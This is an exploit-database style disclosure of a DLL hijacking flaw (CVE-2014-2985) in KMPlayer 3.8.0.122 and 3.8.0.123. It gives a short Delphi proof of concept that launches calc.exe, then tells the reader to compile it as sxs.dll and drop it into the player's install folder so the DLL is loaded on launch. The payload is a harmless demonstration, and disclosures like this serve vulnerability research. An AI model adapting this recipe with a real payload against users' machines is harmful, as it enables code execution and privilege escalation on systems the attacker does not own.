# Kmplayer  3.8.0.122 /  3.8.0.123 DLL Hijacking
#
###########################
#
# Exploit Title: [KmPlayer 3.8.0.123 DLL Hijacking ]
# Date: [2014/04/22]
# Exploit Author: [Aryan Bayaninejad]
# Linkedin : https://www.linkedin.com/profile/view?id=276969082
# Vendor Homepage: [http://www.kmplayer.com/]
# Software Link: [
http://www.softpedia.com/progDownload/KMPlayer-Download-26726.html]
# Version: [Version 3.8.0.122  and 3.8.0.123 ]
# Tested on: [Windows Xp Sp3 - 32bit & Windows 7 - 32bit & 64bit]
# CVE : [CVE-2014-2985]
#
###########################

details:

Untrusted search path vulnerability in Kmplayer latest version [3.8.0.123]
when running on Windows 7, and XP, allows local

users and possibly remote attackers to gain privileges via a Trojan horse
DLL in the current working directory by sxs.dll .

uses
Windows;
begin
Winexec(PAnsichar('C:\WINDOWS\system32\calc.exe'),sw_show);
end.

Compile Above Source Code With Delphi And Rename Compiled DLL To sxs.dll
Then Copy It To The KMPlayer Installed Path, Now If You Run The KMPlayer
DLL Will Hijacked!